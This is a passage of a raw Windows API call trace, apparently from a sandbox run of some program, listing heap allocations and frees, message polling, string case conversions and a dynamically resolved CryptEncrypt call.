HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a00 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0223.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0223.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71be8 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0223.687] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d58 [0223.687] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69790 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.688] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0223.688] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0223.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab848 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.688] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0223.689] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0223.689] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0223.689] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0223.690] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0223.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69b50 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.692] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0223.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.694] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0223.694] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71d28*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71d28*, pdwDataLen=0x8cef60*=0x8) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.694] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0223.695] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.695] PeekMessageW (in: 